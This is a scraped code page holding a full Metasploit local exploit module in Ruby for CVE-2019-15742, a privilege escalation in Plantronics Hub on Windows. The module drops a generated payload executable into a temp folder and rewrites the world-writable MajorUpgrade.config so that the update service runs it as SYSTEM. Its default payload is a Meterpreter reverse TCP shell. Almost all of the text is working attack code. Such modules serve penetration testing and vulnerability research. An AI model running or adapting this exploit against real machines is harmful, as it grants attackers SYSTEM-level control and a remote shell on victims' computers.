扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 |
## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Local Rank = ExcellentRanking include Exploit::EXE include Post::File include Post::Windows::Priv include Post::Windows::Services include Exploit::FileDropper def initialize(info = {}) super(update_info(info, 'Name' => 'Plantronics Hub SpokesUpdateService Privilege Escalation', 'Description'=> %q{ The Plantronics Hub client application for Windows makes use of an automatic update service <code>SpokesUpdateService.exe</code> which automatically executes a file specified in the <code>MajorUpgrade.config</code> configuration file as SYSTEM. The configuration file is writable by all users by default. This module has been tested successfully on Plantronics Hub version 3.13.2 on Windows 7 SP1 (x64). }, 'License'=> MSF_LICENSE, 'Author' => [ 'Markus Krell', # Discovery and PoC 'bcoles'# Metasploit ], 'References' => [ ['CVE', '2019-15742'], ['EDB', '47845'], ['URL', 'https://support.polycom.com/content/dam/polycom-support/global/documentation/plantronics-hub-local-privilege-escalation-vulnerability.pdf'] ], 'Platform' => ['win'], 'SessionTypes' => ['meterpreter'], 'Targets'=> [['Automatic', {}]], 'DisclosureDate' => '2019-08-30', 'DefaultOptions' => { 'PAYLOAD' => 'windows/meterpreter/reverse_tcp' }, 'Notes'=> { 'Reliability' => [ REPEATABLE_SESSION ], 'Stability' => [ CRASH_SAFE ] }, 'DefaultTarget'=> 0)) register_advanced_options [ OptString.new('WritableDir', [false, 'A directory where we can write files (%TEMP% by default)', nil]), ] end def base_dir datastore['WritableDir'].blank? ? session.sys.config.getenv('TEMP') : datastore['WritableDir'].to_s end def service_exists?(service) srv_info = service_info(service) if srv_info.nil? vprint_warning 'Unable to enumerate Windows services' return false end if srv_info && srv_info[:display].empty? return false end true end def check service = 'PlantronicsUpdateService' unless service_exists? service return CheckCode::Safe("Service '#{service}' does not exist") end path = "#{session.sys.config.getenv('PROGRAMDATA')}\\Plantronics\\Spokes3G" unless exists? path return CheckCode::Safe("Directory '#{path}' does not exist") end CheckCode::Detected end def exploit unless check == CheckCode::Detected fail_with Failure::NotVulnerable, 'Target is not vulnerable' end if is_system? fail_with Failure::BadConfig, 'Session already has SYSTEM privileges' end payload_path = "#{base_dir}\\#{Rex::Text.rand_text_alphanumeric(8..10)}.exe" payload_exe = generate_payload_exe vprint_status "Writing payload to #{payload_path} ..." write_file payload_path, payload_exe register_file_for_cleanup payload_path config_path = "#{session.sys.config.getenv('PROGRAMDATA')}\\Plantronics\\Spokes3G\\MajorUpgrade.config" vprint_status "Writing configuration file to #{config_path} ..." write_file config_path, "#{session.sys.config.getenv('USERNAME')}|advertise|#{payload_path}" register_file_for_cleanup config_path end end |
体验盒子
